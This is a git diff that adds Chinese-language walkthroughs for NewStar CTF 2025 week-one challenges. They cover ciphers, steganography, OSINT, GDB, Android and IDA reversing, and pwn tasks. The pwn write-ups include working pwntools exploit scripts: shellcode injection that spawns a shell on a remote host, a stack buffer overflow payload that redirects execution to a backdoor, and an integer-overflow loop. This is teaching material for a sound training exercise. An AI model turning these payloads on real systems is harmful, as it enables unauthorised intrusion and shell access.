+ rail_rows = [''] * rails + current_rail = 0 + direction = 1 # 1表示向下移动,-1表示向上移动 + + for char in plaintext: + rail_rows[current_rail] += char + # 改变方向(到达顶部或底部时) + if current_rail == 0: + direction = 1 + elif current_rail == rails - 1: + direction = -1 + current_rail += direction + + # 连接所有行得到密文 + return ''.join(rail_rows) + + +def rail_fence_decrypt(ciphertext, rails=4): + """栅栏解密算法,将栅栏密码解密为明文""" + if rails == 1: + return ciphertext + + length = len(ciphertext) + # 计算每一行的字符数量 + counts = [0] * rails + current_rail = 0 + direction = 1 + + for _ in range(length): + counts[current_rail] += 1 + if current_rail == 0: + direction = 1 + elif current_rail == rails - 1: + direction = -1 + current_rail += direction + + # 将密文分割到各个行 + rail_rows = [] + index = 0 + for count in counts: + rail_rows.append(list(ciphertext[index:index+count])) + index += count + + # 重建明文 + plaintext = [] + current_rail = 0 + direction = 1 + pointers = [0] * rails # 记录每一行当前读取的位置 + + for _ in range(length): + plaintext.append(rail_rows[current_rail][pointers[current_rail]]) + pointers[current_rail] += 1 + + # 改变方向 + if current_rail == 0: + direction = 1 + elif current_rail == rails - 1: + direction = -1 + current_rail += direction + + return ''.join(plaintext) + + +if __name__ == "__main__": + # 给定的加密字符串 + encrypted_str = "rdh9zfwzSgoVA7GWtLPQJK=vwuZvjhvPyyvjnMWoSotB" + rails = 4 + + # 解密 + decrypted_str = rail_fence_decrypt(encrypted_str, rails) + + print(f"加密字符串: {encrypted_str}") + print(f"解密后的字符串: {decrypted_str}") + + # 验证加密解密的一致性 + re_encrypted = rail_fence_encrypt(decrypted_str, rails) + print(f"重新加密验证: {re_encrypted == encrypted_str}") +``` + +运行后可以得到解密后字符串 `rSvMwgdouWZVhAvoj79GhSvWztPoyLfPytvQwJjBnKz=` 明显是通过 base64 编码后的字符串 + +题干提示图片破损,需要修改图片高度,修改后可得到 + +![ez-fence_2](/assets/images/wp/2025/week1/ez-fence_2.png) + +可以看出这是一个换表 base64,可以写出代码解密 + +```python +import base64 +def custom_base64_decode(encoded_str, custom_table): + # 标准Base64字符表 + standard_table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" + + # 创建从自定义表到标准表的映射 + custom_to_standard = {custom_char: standard_char + for custom_char, standard_char in zip(custom_table, standard_table)} + + # 将自定义Base64字符串转换为标准Base64字符串 + standard_encoded = [] + for char in encoded_str: + if char == '=': # 处理填充字符 + standard_encoded.append('=') + else: + standard_encoded.append(custom_to_standard[char]) + standard_encoded_str = ''.join(standard_encoded) + + # 进行标准Base64解密 + decoded_bytes = base64.b64decode(standard_encoded_str) + return decoded_bytes.decode('utf-8', errors='replace') + +if __name__ == "__main__": + # 加密后的字符串 + encrypted_str = "rSvMwgdouWZVhAvoj79GhSvWztPoyLfPytvQwJjBnKz=" + + # 自定义字符表 + custom_table = "8426513709qazwsxedcrfvtgbyhnujmikoplQWSAERFDTYHGUIKJOPLMNBVCXZ-_" + + # 解密 + decrypted_str = custom_base64_decode(encrypted_str, custom_table) + + print("加密字符串:", encrypted_str) + print("解密结果:", decrypted_str) + + +``` + +可以得到压缩包密码 `New5tar_zjuatrojee1mage5eed77yo#`。 + +输入后可以得到 `flag{y0u_kn0w_ez_fence_tuzh0ng}`。 diff --git a/docs/wp/2025/week1/misc/no-revolution-fail.md b/docs/wp/2025/week1/misc/no-revolution-fail.md new file mode 100644 index 0000000..c21c325 --- /dev/null +++ b/docs/wp/2025/week1/misc/no-revolution-fail.md @@ -0,0 +1,34 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 我不要革命失败 + + + +本题考查 Windows 操作系统出现蓝屏的日志分析。 + + +直接下载 [windbg](https://learn.microsoft.com/zh-cn/windows-hardware/drivers/debugger/) 然后打开。 + +依照提示或者直接点击超链接,就会开始分析蓝屏日志。 + +![开始分析](/assets/images/wp/2025/week1/no-revolution-fail_1.png) + +最开始的这一条,即为崩溃类型(如果蓝屏过的话,这就是蓝屏下面的那行终止代码) + +![崩溃类型](/assets/images/wp/2025/week1/no-revolution-fail_2.png) + +![蓝屏](/assets/images/wp/2025/week1/no-revolution-fail_3.png) + +然后可以从下图位置找到故障进程。 + +![alt text](/assets/images/wp/2025/week1/no-revolution-fail_4.png) + +:::warning +如果使用 windows 自带的 notepad 打开文本文档,默认缩放下会看不到下划线的,记得放大。 +::: diff --git a/docs/wp/2025/week1/misc/osint-sky-belong.md b/docs/wp/2025/week1/misc/osint-sky-belong.md new file mode 100644 index 0000000..49c01d0 --- /dev/null +++ b/docs/wp/2025/week1/misc/osint-sky-belong.md @@ -0,0 +1,40 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# OSINT:天空 belong + + + +本题考查 OSINT 部分的图片寻址类问题。 + + +对于新手第一次接触该类型的问题,可以跳转链接进行了解 [OSINT - Hello CTF](https://hello-ctf.com/hc-misc/osint/) 以便于解出此题。 + +下载完附件,进行解压,我们可以得到一张图片,图片中可以在机翼上看到一个标号 `B-7198`。 + +![](/assets/images/wp/2025/week1/osint-sky-belong_1.png) + +然后查看图片的 EXIF 信息,拍摄时间是 `2025/08/17 15:03:47` 拍摄设备的制造商为 `Xiaomi` + +在前面链接里了解的 [flightaware](https://www.flightaware.com/) 中搜索这个标号,应该是飞机的注册号。 + +![](/assets/images/wp/2025/week1/osint-sky-belong_2.png) + +我们往下查看对应时间的历史航班。 + +![](/assets/images/wp/2025/week1/osint-sky-belong_3.png) + +可以得到飞机的航班号为 `UQ3574`。 + +![](/assets/images/wp/2025/week1/osint-sky-belong_4.png) + +在下面的航线图中,我们调整到拍摄时间,可以发现该航班经过的省会城市有且只有**武汉市**。 + +![](/assets/images/wp/2025/week1/osint-sky-belong_5.png) + +所以答案是 `flag{UQ3574_武汉市_Xiaomi}` diff --git a/docs/wp/2025/week1/misc/search-is-useful.md b/docs/wp/2025/week1/misc/search-is-useful.md new file mode 100644 index 0000000..cb16f0e --- /dev/null +++ b/docs/wp/2025/week1/misc/search-is-useful.md @@ -0,0 +1,64 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 前有文字,所以搜索很有用 + + + +本题考查 Base64 编码、零宽字符隐写、SNOW 隐写、Brainfuck 编程语言、摩斯电码、字频统计等杂项内容的综合应用。 + + +## Track 1 + +misc 手们必须要注意**文件名**的信息,因为这里往往都是出题人给予提示的地方。 + +这一题的文件名称是「fl4g 已经被挤在中间了」。 + +有做过题目的肯定已经有点头绪,但是不急,我们继续再看一下 txt 文件内容。 + +文本内容是很多的「零宽字符」的信息,而且还能看到文字后面还有些奇怪的方格。 + +直接上网搜索零宽字符,其实就能够找到这样的隐写,以及一些线上的网站了,比如[零宽字符在线处理](https://330k.github.io/misc_tools/unicode_steganography.html)。 + +当然,txt 文档为什么只写了这几种零宽字符?因为就只用了这几种,所以你写脚本也是可以解决的。 + +零宽字符解密出来之后是一串奇怪的字符 `ZmxhZ3t5b3Vf`,实际上还是直接搜索一下就知道了,`Zmxh` 这一眼就是 flag 前缀嘛,base64 编码是肯定会接触到的。 + +解决也很简单,线上工具很多,[cyberchef](https://cyberchef.org/)也可以,或者你用[随波逐流](http://150.158.159.129/bo_ctfcode.html)一把梭也可以。 + +本 track 的结果就是 `flag{you_`。 + +## Track 2 + +这一 Track 有两个文件,一个 docx,一个 txt。 + +关键词想必就是「fxxk」和「brain」了,直接搜索一下,就能搜到 [brainfuck](https://baike.baidu.com/item/Brainfuck/1152785) 这种语言,然后就可以搜索[相应的工具](https://www.splitbrain.org/services/ook)。 + +再看文本内容,`here's key`,说明这还是某个东西的 key,不是 flag 本身,总之先解密出来得到 key 为:`brainfuckisgooooood`。 + +得到了 key 之后再回头看 docx 文档,文件名和里面内容的题目都是「咏雪」,既然整个题目都是文本隐写,那就继续搜索跟**雪**有关的隐写。 + +关键词搜索 **雪 隐写**之后,就能找到 SNOW 隐写的工具。 + +把 docx 文档内的包含文本后大量空白部分的文本复制到 txt 里面用工具解密即可获得第二段 flag。 + +```shell +snow.exe -p brainfuckisgooooood input.txt output.txt +``` + +得到一串人人都知道的是摩斯电码的东西,cyberchef 就好了,最后得到 `0V3RC4ME_`。 + +## Track 3 + +这一 Track 还是只有 txt,名称仍然是提示,「谁多谁少,一算便知」,结合 txt 文件里面毫无顺序的文本,其实就是想要做题人去把里面的字符按照多与少的顺序统计出来,按照顺序排列,就是 flag。 + +上网搜索字频统计,也有[相应的工具](https://uutool.cn/str-statistics/) + +最后按照从多到少的顺序就是 flag 最后一部分 `cH@1LenG3s}` + +组合起来得到 `flag{you_0V3RC4ME_cH@1LenG3s}`。 diff --git a/docs/wp/2025/week1/misc/sign-in.md b/docs/wp/2025/week1/misc/sign-in.md new file mode 100644 index 0000000..b235121 --- /dev/null +++ b/docs/wp/2025/week1/misc/sign-in.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# Sign in diff --git a/docs/wp/2025/week1/pwn/gnu-debugger.md b/docs/wp/2025/week1/pwn/gnu-debugger.md new file mode 100644 index 0000000..444121b --- /dev/null +++ b/docs/wp/2025/week1/pwn/gnu-debugger.md @@ -0,0 +1,95 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# GNU Debugger + + + +本题考查 GDB 的的使用。 + + +本题开始之前,你可以先参考 [0x01. Pwn 环境搭建](/learn/pwn.html) 来搭建做题环境。若已经安装好 pwndbg(pwndbg 是一个集成到 GDB 调试器中的插件),这里建议使用最原始的 gdb 来完成这道题目。 + +进入题目附件所在目录,直接运行程序以开始,这里仅对预期解法进行说明。 + +```bash +./gdb_challenge +``` + +输入 `run ` 开始游戏,其中 `ip` 和 `port` 通过开启容器得到。 + +:::tip 举例 + +首先要做的就是开启题目容器。 + +![初始容器](/assets/images/wp/2025/week1/gnu-debugger_1.png) + +nc 后面的 `8.147.132.32` 就是 IP,而 `39543` 则是端口,使用 `run 8.147.132.32 39543` 命令开始游戏。 + +::: + +## 关卡 1:已验丁真 + +```plaintext +向导: +我放了一个随机数在 'r12' 寄存器里面哦, 你可以借助 GDB 的力量一眼丁真吗? +找到 r12 的 16 进制值就按下 c (continue) 来告诉我答案吧! +``` + +需要查看 r12 寄存器的值,这里有很多方法,简单列举其中两个: + +1. `info r`:显示所有寄存器的值,包括 16 进制以及 10 进制 +2. `p/x $r12`:`p` 指打印,`x` 指 16 进制的形式,`$` 指后面的是寄存器 + +![寄存器](/assets/images/wp/2025/week1/gnu-debugger_2.png) + +复制后使用 continue 指令 `c` 让程序继续执行,随后提交即可。 + +## 关卡 2:义眼丁真 + +```plaintext +向导: +这次是内存捏, 我留了一句话在某个地方捏. +偷偷告诉你这个地方在哪里 QwQ -> 0x555555557c27 +猜猜我要对你说什么。找到了就按下 c (continue) 来告诉我答案吧! +``` + +这关使用 `x` 指令来查看内存,使用 `x/` 后面加上不同的参数就能用不同的形式来展示内存,这里稍微列举一些: + +- `x` 按十六进制格式显示变量。 +- `o` 按八进制格式显示变量。 +- `s` 按字符串显示。 +- `i` 显示汇编指令。 + +使用 `x/s 0x555555557c27` 查看对应字符串即可。 + +![第二关](/assets/images/wp/2025/week1/gnu-debugger_3.png) + +## 关卡 3:犹豫丁真 + +```plaintext +向导: +啊,程序中有个函数跑得太快了,他的身上有最后一关的钥匙!我们要抓住他,用 GDB 让他停下来! +如果没能抓住他的话,我们就没办法继续往前走了. +让他停下来拿到钥匙之后,按下一次 c 把钥匙拿过来,然后再次按下 c 继续我们的旅程吧. 注意需要慢慢来,不要按得这么快哦 +偷偷告诉你这个函数在 -> 0x555555555779 +``` + +这关需要给函数下一个断点,使用 break 指令 `b` 即可,注意使用时需要在地址前加上 `*` 来告诉 GDB 这是一个地址,使用指令:`b *0x555555555779`. + +## 关卡 4:应用丁真 + +```plaintext +来到最后一关了,由于环境影响,已经听不清楚向导说的话了。 +向导: +我们的 '(&(……¥&¥#!¥&……&&!@¥#' 现在只有 1 个.....但是要过关的话一共需要 0xdeadbeef 个 +你知道葫芦侠的传说吗,好在 GDB 有一个强大的功能,他可以 *&¥&@34#! 改. +地 $^&!$ 址 -> `0x7fffffffdd04` …*& +``` + +这关使用 `set` 指令来修改数据,同样需要在地址前加上 `*` ,使用指令 `set *0x7fffffffdd04 = 0xdeadbeef` 即可,最后使用 `c` 命令让程序继续执行就能看到 FLAG 了。 diff --git a/docs/wp/2025/week1/pwn/input-function.md b/docs/wp/2025/week1/pwn/input-function.md new file mode 100644 index 0000000..db06fb3 --- /dev/null +++ b/docs/wp/2025/week1/pwn/input-function.md @@ -0,0 +1,52 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# input_function + + + +本题考查无限制 shellcode 的注入。 + + +用 IDA 打开这个程序,点击 F5,我们就可以看到程序的反编译,如下图: + +![main 函数内容](/assets/images/wp/2025/week1/input-function_1.png) + +由于一般程序是从 `main` 函数开始提供服务的,所以我们重点分析 `main` 函数 + +在左侧 `function name` 表中双击 `main` 这个函数名: + +![逻辑分析](/assets/images/wp/2025/week1/input-function_2.jpg) + +可以看到,程序先通过 `mmap` 开辟了一个 `0x1000`(一个页表)bytes 的内存空间,并设置为了可读可写可执行(函数参数中的 7 的二进制表示为 111,从低位到高位分别表示可读可写可执行),随后将这个空间的地址存入 `buf` 变量中。之后程序先输出了一个字符串,随后通过 `read` 函数读取用户输入,将输入写入 `buf` 变量内。随后进行了一个调用操作。 + +运行程序,尝试随便输入些内容: + +![报错信息](/assets/images/wp/2025/week1/input-function_3.png) + +会发现程序报错,这是由图中红色框选的部分 `buf()` 错误引发的。`((void (*)(void))buf)();`这个语句是指,将 `buf` 强制转换成一个函数指针,这样直接调用函数就相当于把 `buf` 指向的内存空间的内容作为函数内容(字节码)来执行。因此我们需要输入一个合法可执行的字节码,这叫做 **shellcode 注入**。 + +这一题是初级 shellcode,我们输入的内容会被解析成函数并执行,因此我们要写汇编代码,并通过 `asm()` 函数等方式汇编成机器码,并将机器码输入交互程序中。 + +由于可输入的字符数很多,因此可以使用 Python 脚本和 `pwntools` 库直接生成。 + +```python +from pwn import * +context(os="linux", arch="amd64", log_level="debug") + +io = remote("8.147.132.32", 12380) +# io = process("./pwn") + +shell = shellcraft.sh() +shell = asm(shell) +io.send(shell) + +io.interactive() +``` + +关于手写 shellcode,具体可以阅读[这篇文章](https://www.cnblogs.com/ZIKH26/articles/15845766.html)。 diff --git a/docs/wp/2025/week1/pwn/intbug.md b/docs/wp/2025/week1/pwn/intbug.md new file mode 100644 index 0000000..deb5466 --- /dev/null +++ b/docs/wp/2025/week1/pwn/intbug.md @@ -0,0 +1,54 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# INTbug + + + +本题考查整数溢出。 + + +使用 IDA Pro 打开题目附件,按下 F5 进行反编译,查看 `main` 函数: + +![main 函数](/assets/images/wp/2025/week1/intbug_1.png) + +双击 `func` 函数查看器内容: + +![func 函数](/assets/images/wp/2025/week1/intbug_2.png) + +程序的逻辑很简单:若输入正数,`v1` 就会加 1;如果 `v1` 小于 0,那么就可以拿到 FLAG. + +`v1` 的类型是 `__int16`,2 字节,有符号整数,可表示的数据范围为 `[-32768, -1]` `[0, 32767]`,用补码表示为 `[0x8000, 0xffff]` `[0, 0x7fff]`. + +:::info 补码 + +「原码」的最高位为符号位,其余各位为数值位;「反码」是原码的符号位不变,其余各位取反。 + +「补码」是计算机中表示有符号整数的一种方式。对于正数,补码与原码相同;对于负数,补码是反码加 1,符号为不变。 + +但是这样会引入两个 0(正零和负零)。特别地,对于 $n$ 位原码: + +- 符号为 0,数值位全为 0(正零),表示数值 $0$; +- 符号为 1,数值全为 0(负零),表示数值 $-2^n$. + +对于负数的补码,根据补码求原码,也只需求补码的补码加 1 即可,符号位不变。即负数的原码与补码互补(保持总二进制位数不变的情况下,相加为 0)。 + +在本题中,补码 `0x8000` 二进制表示为 `1000 0000 0000 0000`,补码的补码为 `1111 1111 1111 1111`,加 1 得到原码 `1000 0000 0000 0000`,即表示数值 $-32768$. +::: + +当 `v1` 等于最大值 `0x7fff` 时,再加 1 就会变为 `0x8000`,而 `0x8000` 为 `-32768`,发生整数溢出,小于 0,从而拿到 FLAG. + +因此只要 `v1` 大于 `0x7fff` 即可,可以利用 Python 的 `pwntools` 库写一个循环。 + +```python +from pwn import * +p = remote("",) +for i in range(0x7fff+1): + p.sendline(b"1") +p.interactive() +``` diff --git a/docs/wp/2025/week1/pwn/overflow.md b/docs/wp/2025/week1/pwn/overflow.md new file mode 100644 index 0000000..f19155f --- /dev/null +++ b/docs/wp/2025/week1/pwn/overflow.md @@ -0,0 +1,196 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# overflow + + + +本题考查栈溢出和对栈结构的理解。 + + +在本题开始之前,你需要先了解栈结构与栈溢出。 + +## 栈结构 + +栈是一种典型的后进先出(Last In First Out)的数据结构,它的基本结构是栈顶(rsp 寄存器的值)和栈底(rbp 寄存器的值)。其操作主要有压栈(push)与出栈(pop)两种操作。push 可以把寄存器里的值或者一个立即数压入栈,pop 则是把 rsp 寄存器(也就是栈顶)指向的值弹出给一个寄存器。 + +push 操作: + + + +pop 操作: + + + +以 64 位操作系统为例,对于函数调用栈来说,`[rbp+8]` 的位置会跟随一个 `return addr`,存储函数的返回地址。 + +## 函数调用栈 + + + +理解本节时,请严格区分「地址」「值」以及「指针」的概念。 + + +假设有以下函数调用关系: + +```c +void send() { + // ... + return; +} + +void entry() { + send(); +} +``` + +函数调用栈的栈空间示意图如下,左图为 `entry` 函数调用 `send` 函数前的栈空间状态,右图为调用 `send` 函数后某一时刻的栈空间状态。 + +
+ + + + + +
+ +函数调用栈中,帧指针(栈底指针) `rbp` 指向的位置(存储的地址)存储着上一个函数(调用者)的栈底位置(地址)。如上图中,「previous rbp」的值为粉色的「previous rbp」的地址。 + +而返回地址 `return addr` 的位置(`[rbp+8]`)存储着调用该函数的下一条指令地址(地址)。 + +栈底元素和返回地址共同承担了函数 return 后「恢复现场」的职责。 + +### 函数返回 + +当函数 return 时,程序会执行 `leave` 和 `ret` 指令。 + +`leave` 等价于: + +```asm +mov rsp, rbp ; 将 rbp 的值存储到 rsp 寄存器 +pop rbp ; 弹出当前栈顶元素,并保存到 rbp 寄存器 +``` + +> [!TIP] +> +> `pop xxx` 完成了两个操作:存储栈顶元素到 xxx,改变了栈指针(栈顶指针)。 +> +> 以 64 位操作系统为例,等价于: +> +> ```asm +> mov xxx, [rsp] ; 将栈顶的值(rsp 指针指向的值)加载到 xxx 寄存器 +> add rsp, 8 ; 栈指针向上移动 8 字节(64 位) +> ``` + +`mov rsp, rbp` 最终将栈指针(栈顶指针)恢复到帧指针(栈底指针)的位置。 + + + +`pop rbp` 最终将帧指针(栈底指针)变为上一个函数的栈底位置。 + + + +这样,通过 `leave` 指令,栈就恢复到调用该函数之前的状态。 + +`ret` 等价于: + +```asm +pop rip ; 弹出当前栈顶元素,并保存到指令指针寄存器 rip +``` + +`rip` 寄存器存储着下一条将要执行的指令地址。 + + + +于是,再通过 `ret` 指令,程序跳转到 `return addr` 处继续执行。 + +### 函数调用 + +了解了返回操作后,我们再来理解函数调用时栈的变化,则是「保存现场」。「保存现场」需要保存两个内容:调用者的栈底位置和返回地址。 + +返回地址的保存由 `call` 指令完成的,它位于调用函数(在上例代码中为 `entry`)的诸多指令中。 + +假设有一个函数 `func`,它的(起始)地址为 `xxx`. `call xxx` 指令等价于: + +```asm +push rip + 5 ; 将下一条指令地址压入栈中作为返回地址(5 代表指令长度) +jmp xxx ; 跳转到 xxx 地址执行 +``` + +而 `func` 函数开始时,通常会有如下两条指令: + +```asm +push rbp ; 将调用者的栈底位置弹入 +mov rbp, rsp ; 设置当前函数的栈底位置 +``` + +`push rbp` 完成了调用者栈底位置的保存。 + + + +`mov rbp, rsp` 设置了当前函数的栈底位置。 + + + +这样,函数调用时栈完全切换到了被调用函数栈空间应有的状态。 + +## 栈溢出 + +栈溢出漏洞:通过向栈中写入超出预期的数据,覆盖返回地址或其他关键数据,从而劫持程序的执行流。 + +由于数组的低索引存储在栈的低地址(靠近栈顶),高索引存储在栈的高地址(靠近栈底),因此当向数组写入过多数据发生溢出时,可以覆盖到 `previous rbp` 和 `return addr` 等位于栈的更高地址的内容。 + +## 解题 + +将附件拖入 IDA Pro 中,按下 F5 进行反编译,查看 `main` 函数: + +![main 函数](/assets/images/wp/2025/week1/overflow_3.png) + +双击 `try` 函数,跟进查看,里面有一个 `gets` 函数,这个函数不限制读入的长度,就会造成栈溢出。 + +![try 函数](/assets/images/wp/2025/week1/overflow_4.png) + +本题还有一个后门函数 `backd00r` 可以执行 shell. + +![backd00r 函数](/assets/images/wp/2025/week1/overflow_5.png) + +那么接下来思路就很清晰了,先填垃圾数据把栈填满,然后把 `return addr` 的位置写上我们的后门函数的地址就能顺利执行 `system("/bin/sh")`. + +在反编译界面按 TAB 切换到汇编界面,再按 Space 可以切换视图。 + +![汇编视图](/assets/images/wp/2025/week1/overflow_6.png) + +`backd00r` 函数的地址是 `0x401200`,但是直接填这个地址会造成栈不对齐的问题,所以我们填 `0x401201`(不需要进行 `push rbp`)。 + +> [!INFO] 栈对齐 +> 在某些系统架构中,栈需要保持特定的对齐方式(例如 16 字节对齐),以提高内存访问效率和性能。如果栈未正确对齐,可能会导致程序崩溃或性能下降。因此,在进行栈操作时,确保栈指针(rsp)保持适当的对齐是非常重要的。 +> +> 「+1 偏移」通常用于跳过函数开头的 `push rbp` 指令。 + +于是我们要先将 `buffer` 的 256 字节填满,再填 8 字节覆盖 `rbp`,最后填上 `0x401201` 即可。 + +附解题脚本: + +```python +from pwn import * + +r = remote('IP', PORT) +# r = process('./overflow') +payload = b'A' * (256 + 8) + p64(0x401201) +r.sendline(payload) +r.interactive() +``` diff --git a/docs/wp/2025/week1/pwn/pwn-door.md b/docs/wp/2025/week1/pwn/pwn-door.md new file mode 100644 index 0000000..fb73322 --- /dev/null +++ b/docs/wp/2025/week1/pwn/pwn-door.md @@ -0,0 +1,46 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# pwn's door + + + +本题考查 nc 的使用。 + + +在点击下发赛题后会有如下内容: + +![容器界面](/assets/images/wp/2025/week1/pwn-door_1.png) + +这表示题目需要使用 nc 进行访问,命令格式为: + +```bash +nc ip port +``` + +其中 `ip` 和 `port` 分别是访问 IP(也可以是域名)和端口,在安装了 netcat 的情况下,在终端指向上述命令就能连接上靶机。关于安装 netcat,可参见 [Netcat 使用指南](/learn/nc)。 + +如上图所示,只需要在终端输入 `nc 8.147.132.32 39543` 即可访问题目环境。具体的访问地址不同选手不一致。 + +题目给了一个附件,需要进行程序分析,使用用 IDA Pro 打开,会看到如图所示的界面: + +![IDA 界面](/assets/images/wp/2025/week1/pwn-door_2.png) + +按下 F5 可以查看反编译后的 C 代码。在左侧「Function name」中找到 `main` 函数并查看反编译结果。 + +![IDA 分析](/assets/images/wp/2025/week1/pwn-door_3.png) + +代码大意为:用户输入一个数字,存入 `v4` 变量,如果 `v4` 等于 `7038329`,则执行 `system("/bin/sh")`,进入 shell. + +附件是 Linux 操作系统中的可执行文件格式 ELF,在本地 Linux 环境中运行程序,我们输入 `7038329` 并回车,进入 shell,运行 `whoami` 成功。 + +![本地运行](/assets/images/wp/2025/week1/pwn-door_4.png) + +连接远程环境,输入 `7038329` 进入 shell 并运行 `cat flag` 即可获取 FLAG. + +![远程运行](/assets/images/wp/2025/week1/pwn-door_5.png) diff --git a/docs/wp/2025/week1/reverse/ezmydroid.md b/docs/wp/2025/week1/reverse/ezmydroid.md new file mode 100644 index 0000000..9e8d1dc --- /dev/null +++ b/docs/wp/2025/week1/reverse/ezmydroid.md @@ -0,0 +1,36 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# EzMyDroid + + + +本题考查 Java 层安卓逆向中 AES 加密的分析与破解。 + + +`Jadx-gui` 打开搜索字符串 `Wrong`,定位代码 + +![alt text](/assets/images/wp/2025/week1/ezmydroid_1.png) + +可以看到一个加密调用,和密文比较。 + +加密如下,看类名可以知道是 `AES` 的 `ECB` 模式,第一个参数是输入的 `flag` 第二个参数是密钥。 + +```java +String encrypt = AESECBUtils.encrypt(FirstFragment.this.binding.input.getText().toString(), "1145141919810000"); +``` + +密文肯定就是,被 base64 编码过。 + +```java +encrypt.equals("cTz2pDhl8fRMfkkJXfqs2t8JBsqLkvQZDLYpWjEtkLE=") +``` + +进入解密网站 [赛博厨子](https://cyberchef.org/) + +![alt text](/assets/images/wp/2025/week1/ezmydroid_2.png) diff --git a/docs/wp/2025/week1/reverse/plzdebugme.md b/docs/wp/2025/week1/reverse/plzdebugme.md new file mode 100644 index 0000000..a877b38 --- /dev/null +++ b/docs/wp/2025/week1/reverse/plzdebugme.md @@ -0,0 +1,174 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# plzdebugme + + + +本题考查 IDA 软件中动态调试功能的使用。 + + +## 1、IDA Local 模式调试 + +IDA Pro 不仅是反汇编器,还是一个强大的调试器。 + +**Q**:什么是 Local 模式? + +**A**:IDA 的 Local Windows Debugger(本地调试器) 模式,顾名思义,是在当前操作系统中直接运行目标程序并调试它的方式。 + +- Windows 上调试 .exe → 使用 Local Windows Debugger +- Linux 上调试 .elf → 使用 Local Linux Debugger + +**设置断点:** + +在汇编视图或伪代码视图中,移动光标到想要设置断点的行,按下 F2 键,或点击行号左侧的空白区域(会出现一个小红点)。再次按下 F2 或点击红点可以取消断点。 + +![断点设置](/assets/images/wp/2025/week1/plzdebugme_1.png) + +**启动调试:** + +在顶部的工具栏中,选择合适的调试器 (Debugger)。例如,分析本地 Windows 程序,可以选择「Local Windows debugger」。 + +![打开调试](/assets/images/wp/2025/week1/plzdebugme_2.png) + +然后点击绿色的运行按钮 (通常是一个向右的三角形,快捷键 F9 开始调试。程序会在第一个断点处停下。 + +调试器还提供了单步执行 F7 步入,F8 步过)、查看寄存器、内存、堆栈等功能。 + +常见错误: + +| 问题 | 解决方法 | +| ------------------ | ------------------------------------------------------------- | +| 无法启动调试器 | 检查是否正确选择了 “Local Windows debugger” | +| 断点没触发 | 确保你设置的断点是在程序真正执行路径上 | +| 一运行就崩溃或退出 | 尝试在更靠前的位置(如入口点)设置断点 | +| 无法查看栈或寄存器 | 运行状态下才能看到,静态分析时是空的 | + +## 2、IDA Remote 模式(远程调试) + +**Q**:为什么需要 Remote 模式? + +**A**:程序必须在它所支持的平台上运行。 + +如果你的程序不是本机架构,比如: + +- Windows 上调试 Linux ELF 文件 +- x86 上调试 ARM 指令集 +- 调试 Android 的 so 文件 + +那么你有两个选择: + +- 把这个程序放到目标系统(如 ARM Linux)+ 安装 IDA + 用 Local 调试(成本高)。 +- 使用 Remote 模式:IDA 在你主机上,通过网络连接一个运行目标程序的调试器代理。 + +Remote 模式本质: + +- 你在目标平台上运行一个 调试代理程序(IDA Debug Server),IDA 通过网络连接这个代理,远程控制调试过程。 + +常见代理如: + +- linux_server(调试 Linux ELF) +- android_server(调试安卓 .so) + +环境要求: + +1. 你需要有一个 Linux 环境。 +2. 在 IDA-dbgsrv 里有个文件叫 `linux_server`,把它放到你的 Linux 环境里。 + +![linux_server](/assets/images/wp/2025/week1/plzdebugme_3.png) + +然后在 Linux 里依次输入以下命令: + +```bash +chmod 777 linux_server +./linux_server +``` + +![远程启动](/assets/images/wp/2025/week1/plzdebugme_4.png) + +然后在 IDA 里选择 Remote Linux Debugger,输入你的 Linux 服务器 IP 地址和端口号,然后点击连接。 + +![IDA 设置](/assets/images/wp/2025/week1/plzdebugme_5.png) + +输入在你的 Linux 环境里面,其他与本地调试相同。 + +![linux 环境输入](/assets/images/wp/2025/week1/plzdebugme_6.png) + +## 3、 基础调试技巧 + +| 功能 | 快捷键 | 说明 | +| --------------------------------------- | -------------------------------- | ----------------------------------------- | +| 设置断点 | F2 | 点击某行或在地址上按 F2 | +| 启动调试 | F9 | 开始运行程序 | +| 继续运行 | F9 | 从当前断点继续 | +| 单步跳入 | F7 | 进入子函数 | +| 单步跳过 | F8 | 跳过函数(不进入) | +| 显示寄存器 | AltC | 弹出 CPU 寄存器窗口 | +| 调试内存(Dump) | D | 查看任意内存段 | +| 查看字符串 | ⇧ ShiftF12 | 快速查看程序中引用的字符串 | + +## 4、常见调试窗口介绍 + +调试状态下,IDA 会显示多个重要窗口。理解它们,是学好调试的第一步。 + +### 1️⃣ General Registers(寄存器窗口) + +位置:Debugger → Debugger Windows → General Registers 一般动调打开就有 + +![寄存器表](/assets/images/wp/2025/week1/plzdebugme_7.png) + +![寄存器表](/assets/images/wp/2025/week1/plzdebugme_8.png) + +通用寄存器:如 `EAX`, `EBX`, `ECX`, `ESP`, `EBP` 等,展示当前 CPU 寄存器状态 + +`XMM` 寄存器:显示 `SIMD` 浮点指令用到的寄存器,常用于加密算法或浮点运算 + +> [!INFO] +> 寄存器中的值可以直接右键修改! + +### 2️⃣ Stack(栈窗口) + +位置:Debugger → Debugger Windows → Stack view + +![栈窗口](/assets/images/wp/2025/week1/plzdebugme_9.png) + +展示当前栈内存的布局,能看到局部变量、函数返回地址、调用参数等。 + +### 3️⃣ Modules + +位置:Debugger → Debugger Windows → Modules + +![加载模块](/assets/images/wp/2025/week1/plzdebugme_10.png) + +显示当前加载的模块,比如: + +- 主程序本体 +- Windows 动态链接库(如 kernel32.dll, user32.dll) +- 可以查看模块基址、大小等。 + +### 4️⃣ Output 窗口(下方) + +实时输出调试信息、IDA 插件信息等,便于跟踪调试过程中的反馈。 + +![output 窗口](/assets/images/wp/2025/week1/plzdebugme_11.png) + +## 题解过程 